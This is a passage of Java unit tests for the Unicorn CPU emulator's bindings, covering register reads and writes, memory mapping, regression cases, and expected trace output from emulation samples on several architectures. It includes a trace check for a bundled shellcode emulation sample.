u.reg_write(Unicorn.UC_X86_REG_EDX, 0x22334455); u.mmio_map(0xaaaaa000L, 0x1000, (uc, offset, size, user_data) -> { assertEquals("read offset", 0xaa8, offset); assertEquals("read size", 4, size); assertEquals("read user_data", "read_data", user_data); return 0x44556677; }, "read_data", (uc, offset, size, value, user_data) -> { assertEquals("write offset", 0xaa8, offset); assertEquals("write size", 4, size); assertEquals("write value", 0x44556678, value); assertEquals("write user_data", "write_data", user_data); }, "write_data"); u.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ_WRITE.length, 0, 0); assertEquals("ecx", 0x44556679, u.reg_read(Unicorn.UC_X86_REG_ECX)); assertEquals("edx", 0x22334453, u.reg_read(Unicorn.UC_X86_REG_EDX)); } @Test public void testMemMapPtr() { ByteBuffer buffer = ByteBuffer.allocateDirect(0x1000).order(ByteOrder.LITTLE_ENDIAN); final byte[] X86_CODE32_MEM_WRITE = { -119, 13, -86, -86, -86, -86, 65, 74 }; long ADDRESS = 0x100000; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_map_ptr(0xaaaaa000L, buffer, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, X86_CODE32_MEM_WRITE); u.reg_write(Unicorn.UC_X86_REG_ECX, 0x12345678); u.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_WRITE.length, 0, 0); assertEquals("buffer contents", 0x12345678, buffer.getInt(0xaaa)); } } unicorn-2.1.1/bindings/java/src/test/java/tests/RegTests.java000066400000000000000000000223101467524106700241540ustar00rootroot00000000000000package tests; import static org.junit.Assert.assertArrayEquals; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertNotEquals; import static org.junit.Assert.assertThrows; import java.math.BigInteger; import org.junit.Test; import unicorn.Arm64_CP; import unicorn.SyscallHook; import unicorn.Unicorn; import unicorn.UnicornException; import unicorn.X86_Float80; public class RegTests { @Test public void testX86ReadFloat80() { // fldl2e; fsin final byte[] X86_CODE = { -39, -22, -39, -2 }; long ADDRESS = 0x100000; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, X86_CODE); u.emu_start(ADDRESS, ADDRESS + X86_CODE.length, 0, 0); X86_Float80 reg1 = (X86_Float80) u.reg_read(Unicorn.UC_X86_REG_ST0, null); X86_Float80 reg2 = (X86_Float80) u.reg_read(Unicorn.UC_X86_REG_FP7, null); assertEquals(null, ADDRESS, ADDRESS, ADDRESS); assertEquals(Math.sin(Math.log(Math.E) / Math.log(2)), reg1.toDouble(), 1e-12); assertEquals(reg1.toDouble(), reg2.toDouble(), 1e-12); } @Test public void testX86WriteFloat80() { // fsin final byte[] X86_CODE = { -39, -2 }; long ADDRESS = 0x100000; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, X86_CODE); X86_Float80 reg = X86_Float80.fromDouble(-1.1); u.reg_write(Unicorn.UC_X86_REG_ST0, reg); u.emu_start(ADDRESS, ADDRESS + X86_CODE.length, 0, 0); reg = (X86_Float80) u.reg_read(Unicorn.UC_X86_REG_ST0, null); assertEquals(Math.sin(-1.1), reg.toDouble(), 1e-12); } /** Test batch register API. Ported from sample_batch_reg.c. Not a sample * because the Java version of this API is deprecated. */ @Test public void testBatchReg() { int[] syscall_abi = { Unicorn.UC_X86_REG_RAX, Unicorn.UC_X86_REG_RDI, Unicorn.UC_X86_REG_RSI, Unicorn.UC_X86_REG_RDX, Unicorn.UC_X86_REG_R10, Unicorn.UC_X86_REG_R8, Unicorn.UC_X86_REG_R9 }; Object[] vals = { 200L, 10L, 11L, 12L, 13L, 14L, 15L }; long BASE = 0x10000L; // mov rax, 100; mov rdi, 1; mov rsi, 2; mov rdx, 3; mov r10, 4; mov r8, 5; mov // r9, 6; syscall byte[] CODE = samples.Utils.hexToBytes("48c7c06400000048c7c70100000048c7c602" + "00000048c7c20300000049c7c20400000049" + "c7c00500000049c7c1060000000f05"); Unicorn uc = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_64); uc.reg_write_batch(syscall_abi, vals); Object[] rvals = uc.reg_read_batch(syscall_abi); assertArrayEquals(vals, rvals); uc.hook_add((SyscallHook) (u, user_data) -> { Object[] nvals = u.reg_read_batch(syscall_abi); assertArrayEquals(new Object[] { 100L, 1L, 2L, 3L, 4L, 5L, 6L }, nvals); }, Unicorn.UC_X86_INS_SYSCALL, 1, 0, null); uc.mem_map(BASE, 0x1000, Unicorn.UC_PROT_ALL); uc.mem_write(BASE, CODE); uc.emu_start(BASE, BASE + CODE.length, 0, 0); } @Test public void testBigIntegerRegister() { Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); int reg = Unicorn.UC_ARM64_REG_V0; assertThrows(UnicornException.class, () -> uc.reg_read(reg)); assertThrows(UnicornException.class, () -> uc.reg_write(reg, 1L)); assertThrows(ClassCastException.class, () -> uc.reg_write(reg, (Long) 1L)); BigInteger b127 = BigInteger.valueOf(2).pow(127); BigInteger bmax = BigInteger.valueOf(2).pow(128).subtract(BigInteger.ONE); uc.reg_write(reg, BigInteger.ZERO); assertEquals("write 0, get 0", BigInteger.ZERO, uc.reg_read(reg, null)); uc.reg_write(reg, BigInteger.ONE); assertEquals("write 1, get 1", BigInteger.ONE, uc.reg_read(reg, null)); assertEquals("get 1 from alias", BigInteger.ONE, uc.reg_read(Unicorn.UC_ARM64_REG_Q0, null)); uc.reg_write(reg, BigInteger.ONE.negate()); assertEquals("write -1, get 2^128 - 1", bmax, uc.reg_read(reg, null)); uc.reg_write(reg, b127); assertEquals("write 2^127, get 2^127", b127, uc.reg_read(reg, null)); uc.reg_write(reg, b127.negate()); assertEquals("write -2^127, get 2^127", b127, uc.reg_read(reg, null)); uc.reg_write(reg, bmax); assertEquals("write 2^128 - 1, get 2^128 - 1", bmax, uc.reg_read(reg, null)); assertThrows("reject 2^128", IllegalArgumentException.class, () -> uc.reg_write(reg, bmax.add(BigInteger.ONE))); assertEquals("reg unchanged", bmax, uc.reg_read(reg, null)); assertThrows("reject -2^127 - 1", IllegalArgumentException.class, () -> uc.reg_write(reg, b127.negate().subtract(BigInteger.ONE))); assertEquals("reg unchanged", bmax, uc.reg_read(reg, null)); byte[] b = new byte[0x80]; b[0x70] = -0x80; uc.reg_write(reg, new BigInteger(b)); assertEquals("write untrimmed value", b127, uc.reg_read(reg, null)); } @Test public void testArm64Vector() { // add v0.8h, v1.8h, v2.8h final byte[] ARM64_CODE = { 0x20, (byte) 0x84, 0x62, 0x4e }; long ADDRESS = 0x100000; Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); uc.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); uc.mem_write(ADDRESS, ARM64_CODE); uc.reg_write(Unicorn.UC_ARM64_REG_V0, new BigInteger("0cc175b9c0f1b6a831c399e269772661", 16)); // MD5("a") uc.reg_write(Unicorn.UC_ARM64_REG_V1, new BigInteger("92eb5ffee6ae2fec3ad71c777531578f", 16)); // MD5("b") uc.reg_write(Unicorn.UC_ARM64_REG_V2, new BigInteger("-4a8a08f09d37b73795649038408b5f33", 16)); // -MD5("c") assertThrows("rejects overly large values", IllegalArgumentException.class, () -> uc.reg_write(Unicorn.UC_ARM64_REG_V2, new BigInteger("1111222233334444aaaabbbbccccdddde", 16))); assertEquals("v0 value", new BigInteger("0cc175b9c0f1b6a831c399e269772661", 16), uc.reg_read(Unicorn.UC_ARM64_REG_V0, null)); assertEquals("v1 value", new BigInteger("92eb5ffee6ae2fec3ad71c777531578f", 16), uc.reg_read(Unicorn.UC_ARM64_REG_V1, null)); assertEquals("v2 value", new BigInteger("b575f70f62c848c86a9b6fc7bf74a0cd", 16), uc.reg_read(Unicorn.UC_ARM64_REG_V2, null)); uc.emu_start(ADDRESS, ADDRESS + ARM64_CODE.length, 0, 0); assertEquals("v0.8h = v1.8h + v2.8h", new BigInteger("4860570d497678b4a5728c3e34a5f85c", 16), uc.reg_read(Unicorn.UC_ARM64_REG_V0, null)); } @Test public void testArm64EnablePAC() { // paciza x1 final byte[] ARM64_CODE = { (byte) 0xe1, 0x23, (byte) 0xc1, (byte) 0xda }; long ADDRESS = 0x100000; Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); uc.ctl_set_cpu_model(Unicorn.UC_CPU_ARM64_MAX); uc.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); uc.mem_write(ADDRESS, ARM64_CODE); Arm64_CP sctlr_el3 = new Arm64_CP(1, 1, 3, 6, 0); sctlr_el3.val = (Long) uc.reg_read(Unicorn.UC_ARM64_REG_CP_REG, sctlr_el3); // NS | RW | API sctlr_el3.val |= 1L | (1L << 10) | (1L << 17); uc.reg_write(Unicorn.UC_ARM64_REG_CP_REG, sctlr_el3); sctlr_el3.val = (Long) uc.reg_read(Unicorn.UC_ARM64_REG_CP_REG, sctlr_el3); Arm64_CP sctlr_el1 = new Arm64_CP(1, 0, 3, 0, 0); sctlr_el1.val = (Long) uc.reg_read(Unicorn.UC_ARM64_REG_CP_REG, sctlr_el1); // EnIA | EnIB sctlr_el1.val |= (1L << 31) | (1L << 30) | (1L << 27) | (1L << 13); uc.reg_write(Unicorn.UC_ARM64_REG_CP_REG, sctlr_el1); sctlr_el1.val = (Long) uc.reg_read(Unicorn.UC_ARM64_REG_CP_REG, sctlr_el1); Arm64_CP hcr_el2 = new Arm64_CP(1, 1, 3, 4, 0); hcr_el2.val = (Long) uc.reg_read(Unicorn.UC_ARM64_REG_CP_REG, hcr_el2); // API hcr_el2.val |= (1L << 41); uc.reg_write(Unicorn.UC_ARM64_REG_CP_REG, hcr_el2); Arm64_CP apiakeylo_el1 = new Arm64_CP(2, 1, 3, 0, 0); apiakeylo_el1.val = 0x4141424243434444L; uc.reg_write(Unicorn.UC_ARM64_REG_CP_REG, apiakeylo_el1); Arm64_CP apiakeyhi_el1 = new Arm64_CP(2, 1, 3, 0, 1); apiakeyhi_el1.val = 0x1234abcd4444aaaaL; uc.reg_write(Unicorn.UC_ARM64_REG_CP_REG, apiakeyhi_el1); uc.reg_write(Unicorn.UC_ARM64_REG_X1, 0x0000bbbbccccddddL); uc.emu_start(ADDRESS, ADDRESS + ARM64_CODE.length, 0, 0); assertNotEquals("X1 should be signed", 0x0000bbbbccccddddL, uc.reg_read(Unicorn.UC_ARM64_REG_X1)); assertEquals("X1 low bits should be unchanged", 0x0000bbbbccccddddL, uc.reg_read(Unicorn.UC_ARM64_REG_X1) & 0xffffffffffffL); } } unicorn-2.1.1/bindings/java/src/test/java/tests/RegressionTests.java000066400000000000000000000051141467524106700255620ustar00rootroot00000000000000package tests; import static org.junit.Assert.assertEquals; import java.math.BigInteger; import org.junit.Ignore; import org.junit.Test; import unicorn.Unicorn; import unicorn.UnicornException; import unicorn.CodeHook; public class RegressionTests { /** Test for GH #1539: Unable to read ARM64 v or q register using java binding */ @Test public void testARM64VReg() { Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0x1); uc.reg_write(Unicorn.UC_ARM64_REG_V0, BigInteger.valueOf(0x1234)); uc.reg_read(Unicorn.UC_ARM64_REG_X0); assertEquals("V0 value", BigInteger.valueOf(0x1234), uc.reg_read(Unicorn.UC_ARM64_REG_V0, null)); // should not crash assertEquals("V0 low byte", 0x34, uc.reg_read(Unicorn.UC_ARM64_REG_B0)); assertEquals("V0 low halfword", 0x1234, uc.reg_read(Unicorn.UC_ARM64_REG_H0)); } /** Test for GH #1164: Java binding use CodeHook on Windows, will invoke callback before every instruction */ @Test public void testCodeHookRunsOnce() { byte[] ARM_CODE = { 55, 0, (byte) 0xa0, (byte) 0xe3, 3, 16, 66, (byte) 0xe0 }; // mov r0, #0x37; sub r1, r2, r3 int ADDRESS = 0x10000; final int[] hook_count = { 0 }; Unicorn u = new Unicorn(Unicorn.UC_ARCH_ARM, Unicorn.UC_MODE_ARM); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, ARM_CODE); u.hook_add((CodeHook) (uc, address, size, user) -> hook_count[0] += 1, ADDRESS, ADDRESS, null); u.emu_start(ADDRESS, ADDRESS + ARM_CODE.length, 0, 0); assertEquals("Hook should only be called once", 1, hook_count[0]); u.close(); } /** Test that close() can be called multiple times without crashing */ @Test public void testCloseIdempotent() { Unicorn u = new Unicorn(Unicorn.UC_ARCH_ARM, Unicorn.UC_MODE_ARM); u.close(); u.close(); } /** Test that Unicorn instances are properly garbage-collected */ @Ignore("This test is not deterministic") @Test public void testUnicornsWillGC() { final boolean[] close_called = { false }; new Unicorn(Unicorn.UC_ARCH_ARM, Unicorn.UC_MODE_ARM) { @Override public void close() throws UnicornException { close_called[0] = true; super.close(); } }; System.gc(); System.runFinalization(); assertEquals("close() was called", true, close_called[0]); } } unicorn-2.1.1/bindings/java/src/test/java/tests/TestSamples.java000066400000000000000000001633531467524106700246750ustar00rootroot00000000000000package tests; import static org.junit.Assert.assertEquals; import static org.junit.Assume.assumeTrue; import java.io.ByteArrayOutputStream; import java.io.PrintStream; import org.junit.Before; import org.junit.Ignore; import org.junit.After; import org.junit.Test; import unicorn.Unicorn; import unicorn.UnicornConst; public class TestSamples implements UnicornConst { private final ByteArrayOutputStream outContent = new ByteArrayOutputStream(); private final PrintStream originalOut = System.out; @Before public void setUpStreams() { outContent.reset(); System.setOut(new PrintStream(outContent)); } @After public void restoreStreams() { System.setOut(originalOut); } @Test public void testArm() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_arm(); assertEquals( "Emulate ARM code\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> R0 = 0x1234\n" + ">>> R1 = 0x0\n", outContent.toString()); } @Test public void testArmThumb() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_thumb(); assertEquals( "Emulate THUMB code\n" + ">>> Tracing basic block at 0x10000, block size = 0x2\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x2\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> SP = 0x1228\n", outContent.toString()); } @Test public void testArmEb() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_armeb(); assertEquals( "Emulate ARM Big-Endian code\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> R0 = 0x37\n" + ">>> R1 = 0x3456\n", outContent.toString()); } @Test public void testArmThumbEb() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_thumbeb(); assertEquals( "Emulate THUMB Big-Endian code\n" + ">>> Tracing basic block at 0x10000, block size = 0x2\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x2\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> SP = 0x1228\n", outContent.toString()); } @Test public void testArmThumbMrs() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_thumb_mrs(); assertEquals( "Emulate THUMB MRS instruction\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> PC = 0x10004\n", outContent.toString()); } @Test public void testArmThumbIte() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_thumb_ite(); assertEquals( "Emulate a THUMB ITE block as a whole or per instruction.\n" + "Running the entire binary.\n" + ">>> R2: 104\n" + ">>> R3: 1\n" + "\n" + "Running the binary one instruction at a time.\n" + ">>> R2: 104\n" + ">>> R3: 1\n" + "\n", outContent.toString()); } @Test public void testArmReadSctlr() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_read_sctlr(); assertEquals( "Read the SCTLR register.\n" + ">>> SCTLR = 0xc50078\n" + ">>> SCTLR.IE = 0\n" + ">>> SCTLR.B = 0\n", outContent.toString()); } @Test public void testArm64MemFetch() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM64)); samples.Sample_arm64.test_arm64_mem_fetch(); assertEquals( ">>> Emulate ARM64 fetching stack data from high address 10000000000000\n" + ">>> x0(Exception Level)=1\n" + ">>> X1 = 0xc8c8c8c8c8c8c8c8\n", outContent.toString()); } @Test public void testArm64() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM64)); samples.Sample_arm64.test_arm64(); assertEquals( "Emulate ARM64 code\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> As little endian, X15 should be 0x78:\n" + ">>> X15 = 0x78\n", outContent.toString()); } @Test public void testArm64Eb() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM64)); samples.Sample_arm64.test_arm64eb(); assertEquals( "Emulate ARM64 Big-Endian code\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> As big endian, X15 should be 0x78:\n" + ">>> X15 = 0x12\n", outContent.toString()); } @Test public void testArm64Sctlr() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM64)); samples.Sample_arm64.test_arm64_sctlr(); assertEquals( "Read the SCTLR register.\n" + ">>> SCTLR_EL1 = 0xc50838\n" + ">>> SCTLR_EL2 = 0x0\n", outContent.toString()); } @Test public void testArm64HookMrs() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM64)); samples.Sample_arm64.test_arm64_hook_mrs(); assertEquals( "Hook MRS instruction.\n" + ">>> Hook MSR instruction. Write 0x114514 to X2.\n" + ">>> X2 = 0x114514\n", outContent.toString()); } @Test public void testArm64Pac() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM64)); samples.Sample_arm64.test_arm64_pac(); assertEquals( "Try ARM64 PAC\n" + "X1 = 0x1401aaaabbbbcccc\n" + "SUCCESS: PAC tag found.\n", outContent.toString()); } @Test public void testCtlRead() { samples.Sample_ctl.test_uc_ctl_read(); assertEquals( "Reading some properties by uc_ctl.\n" + ">>> mode = 4, arch = 4, timeout=0, pagesize=4096\n", outContent.toString()); } @Test public void testCtlExits() { samples.Sample_ctl.test_uc_ctl_exits(); assertEquals( "Using multiple exits by uc_ctl.\n" + ">>> Getting a new edge from 0x10004 to 0x10005.\n" + ">>> eax = 1 and ebx = 0 after the first emulation\n" + ">>> Getting a new edge from 0x10004 to 0x10007.\n" + ">>> eax = 1 and ebx = 1 after the second emulation\n", outContent.toString()); } @Test public void testM68k() { assumeTrue(Unicorn.arch_supported(UC_ARCH_M68K)); samples.Sample_m68k.test_m68k(); assertEquals( "Emulate M68K code\n" + ">>> Tracing basic block at 0x10000, block size = 0x2\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x2\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> A0 = 0x0 >>> D0 = 0x0\n" + ">>> A1 = 0x0 >>> D1 = 0x0\n" + ">>> A2 = 0x0 >>> D2 = 0x0\n" + ">>> A3 = 0x0 >>> D3 = 0xffffffed\n" + ">>> A4 = 0x0 >>> D4 = 0x0\n" + ">>> A5 = 0x0 >>> D5 = 0x0\n" + ">>> A6 = 0x0 >>> D6 = 0x0\n" + ">>> A7 = 0x0 >>> D7 = 0x0\n" + ">>> PC = 0x10002\n" + ">>> SR = 0x0\n", outContent.toString()); } @Test public void testMipsEl() { assumeTrue(Unicorn.arch_supported(UC_ARCH_MIPS)); samples.Sample_mips.test_mips_el(); assertEquals( "Emulate MIPS code (little-endian)\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> R1 = 0x77df\n", outContent.toString()); } @Test public void testMipsEb() { assumeTrue(Unicorn.arch_supported(UC_ARCH_MIPS)); samples.Sample_mips.test_mips_eb(); assertEquals( "Emulate MIPS code (big-endian)\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> R1 = 0x77df\n", outContent.toString()); } @Test public void testMmuCpuTlb() { samples.Sample_mmu.cpu_tlb(); assertEquals( "Emulate x86 amd64 code with mmu enabled and switch mappings\n" + "map code\n" + "map parent memory\n" + "map child memory\n" + "map tlb memory\n" + "set up the tlb\n" + "run the parent\n" + "save the context for the child\n" + "finish the parent\n" + "write at 0x1000: 0x3c\n" + "restore the context for the child\n" + "write at 0x2000: 0x2a\n" + "parent result == 60\n" + "child result == 42\n", outContent.toString()); } @Test public void testMmuVirtualTlb() { samples.Sample_mmu.virtual_tlb(); assertEquals( "Emulate x86 amd64 code with virtual mmu\n" + "map code\n" + "map parent memory\n" + "map child memory\n" + "run the parent\n" + "tlb lookup for address: 0x2000\n" + "save the context for the child\n" + "finish the parent\n" + "tlb lookup for address: 0x4000\n" + "write at 0x1000: 0x3c\n" + "restore the context for the child\n" + "tlb lookup for address: 0x2000\n" + "tlb lookup for address: 0x4000\n" + "write at 0x2000: 0x2a\n" + "parent result == 60\n" + "child result == 42\n", outContent.toString()); } @Test public void testPpc() { assumeTrue(Unicorn.arch_supported(UC_ARCH_PPC)); samples.Sample_ppc.test_ppc(); assertEquals( "Emulate PPC code\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> r26 = 0x79bd\n", outContent.toString()); } @Test public void testRiscvRecoverFromIllegal() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_recover_from_illegal(); assertEquals( "Emulate RISCV code: recover_from_illegal\n" + ">>> Allocating block at 0x1000 (0x1000), block size = 0x2 (0x1000)\n" + ">>> Tracing basic block at 0x1000, block size = 0x0\n" + "Expected Illegal Instruction error, got: " + "unicorn.UnicornException: Unhandled CPU exception (UC_ERR_EXCEPTION)\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> A0 = 0x1\n" + ">>> A1 = 0x7890\n", outContent.toString()); } @Test public void testRiscv1() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv(); assertEquals( "Emulate RISCV code\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Tracing instruction at 0x10004, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> A0 = 0x1\n" + ">>> A1 = 0x78b0\n", outContent.toString()); } @Test public void testRiscv2() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv2(); assertEquals( "Emulate RISCV code: split emulation\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> A0 = 0x1\n" + ">>> A1 = 0x7890\n" + ">>> Tracing basic block at 0x10004, block size = 0x4\n" + ">>> Tracing instruction at 0x10004, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> A0 = 0x1\n" + ">>> A1 = 0x78b0\n", outContent.toString()); } @Test public void testRiscv3() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv3(); assertEquals( "Emulate RISCV code: early stop\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + "stop emulation\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> A0 = 0x1234\n" + ">>> A1 = 0x7890\n", outContent.toString()); } @Test public void testRiscvStep() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv_step(); assertEquals( "Emulate RISCV code: step\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> A0 = 0x1\n" + ">>> A1 = 0x7890\n" + ">>> Tracing basic block at 0x10004, block size = 0x4\n" + ">>> Tracing instruction at 0x10004, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> A0 = 0x1\n" + ">>> A1 = 0x78b0\n", outContent.toString()); } @Ignore("timeout test is currently broken") @Test public void testRiscvTimeout() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv_timeout(); assertEquals( "Emulate RISCV code: timeout\n" + ">>> Tracing basic block at 0x10000, block size = 0x0\n" + "Failed on uc_emu_start() with error returned: 21\n" + "Error after step: PC is: 0x10004, expected was 0x10004\n" + ">>> Tracing basic block at 0x10000, block size = 0x0\n" + "Failed on uc_emu_start() with error returned: 21\n" + "Error after step: PC is: 0x10004, expected was 0x10004\n" + ">>> Emulation done\n", outContent.toString()); } @Test public void testRiscvSd64() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv_sd64(); assertEquals( "Emulate RISCV code: sd64 instruction\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done.\n", outContent.toString()); } @Test public void testRiscvFuncReturn() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv_func_return(); assertEquals( "Emulate RISCV code: return from func\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Tracing basic block at 0x10006, block size = 0x4\n" + "Good, PC == RA\n" + "========\n" + ">>> Tracing basic block at 0x10004, block size = 0x2\n" + ">>> Tracing instruction at 0x10004, instruction size = 0x2\n" + ">>> Tracing basic block at 0x10006, block size = 0x4\n" + "Good, PC == RA\n" + ">>> Emulation done.\n", outContent.toString()); } @Test public void testS390x() { assumeTrue(Unicorn.arch_supported(UC_ARCH_S390X)); samples.Sample_s390x.test_s390x(); assertEquals( "Emulate S390X code\n" + ">>> Tracing basic block at 0x10000, block size = 0x2\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x2\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> R2 = 0x3 >>> R3 = 0x3\n", outContent.toString()); } @Test public void testShellcode() { samples.Shellcode.test_i386(); assertEquals( "Emulate i386 code\n" + "\n" + ">>> Start tracing this Linux code\n" + "Tracing instruction at 0x1000000, instruction size = 0x2\n" + "*** EIP = 1000000 ***: eb 1c \n" + "Tracing instruction at 0x100001e, instruction size = 0x5\n" + "*** EIP = 100001e ***: e8 df ff ff ff \n" + "Tracing instruction at 0x1000002, instruction size = 0x1\n" + "*** EIP = 1000002 ***: 5a \n" + "Tracing instruction at 0x1000003, instruction size = 0x2\n" + "*** EIP = 1000003 ***: 89 d6 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 